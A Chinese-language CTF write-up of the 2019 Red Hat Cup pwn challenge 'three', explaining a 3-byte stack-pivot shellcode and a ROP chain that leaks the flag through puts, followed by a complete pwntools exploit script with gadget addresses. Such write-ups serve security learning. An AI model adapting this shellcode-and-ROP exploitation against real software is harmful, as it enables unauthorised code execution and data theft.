2019 红帽杯 three 经验总结

这题感觉要对汇编语言要比较熟悉会更容易做出来…

程序逻辑分析:
2019 红帽杯 three 经验总结_第1张图片
2019 红帽杯 three 经验总结_第2张图片
2019 红帽杯 three 经验总结_第3张图片
前两个函数通过读取flag文件的内容, 并将存放flag的chunk的地址放入bss段中
2019 红帽杯 three 经验总结_第4张图片
在程序中可以输入3个字节的指令, 之后再执行这三个指令, 所以目的是植入3个字节的shellcode来获取flag

利用思路:

通过调试发现在执行call eax 之前, ecx寄存器中存放的是bss段的地址0x80f6cc0, 而前面输入的name的地址是从0x80f6cc0开始的, 那么可以考虑把栈迁移到bss段, 之后进行rop将flag读出来

具体步骤:

  1. 植入的三字节指令为
    mov esp, [ecx]; ret;
    完成栈迁移

2.完成栈迁移后需要考虑的是如何将flag读出
在这里插入图片描述
观察汇编代码发现, puts函数的参数放在寄存器eax中, 那么可以考虑将指向flag的地址存入eax中在利用puts输出

  1. 调试中发现
    0x80F6C80(bss) -> 0x5703440(heap) -> flag
    那么可以先利用pop eax 将0x80F6C80 存入 eax中
    之后 再执行 mov eax, [eax] 将指向flag的地址存入eax中, 最后再跳转到
    push eax
    call sub_80506F0
    调用puts函数将flag输出

不得不说学长强啊…

EXP:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context(os='linux',arch='i386', terminal = ['tmux', 'splitw', '-h'])

def rsl(c,s):
    r.recvuntil(c)
    r.sendline(s)

def rs(c,s):
    r.recvuntil(c)
    r.send(s)

def pwn(local, d, ip = 0, port = 0):
	global r
	if local == 0:
		r = process("./irpwn")
		if d == 1:
			gdb.attach(r)
	else:
		r = remote(ip, port)
	
	'''
	0x80C11E6: pop eax; ret;
	0x80A7EBB: mov eax, DWORD PTR [eax];ret;
	'''
	flag = p32(0x080F6CC4)+p32(0x080C11E6)+p32(0x80F6C80)+p32(0x080A7EBB)+p32(0x08048B82) + p64(0x080C11E6)

	payload =asm('mov esp,[ecx];ret')

	rsl("Give me a index:\n",str(0))

	rsl("Three is good number,I like it very much!\n",payload)
	rsl("Leave you name of size:\n", str(len(flag)))
	raw_input()
	rs("Tell me:\n", flag)
	r.recv(20)

	r.interactive()

if __name__ == '__main__':
	pwn(0, 1)

结果:
2019 红帽杯 three 经验总结_第5张图片

你可能感兴趣的:(PWN)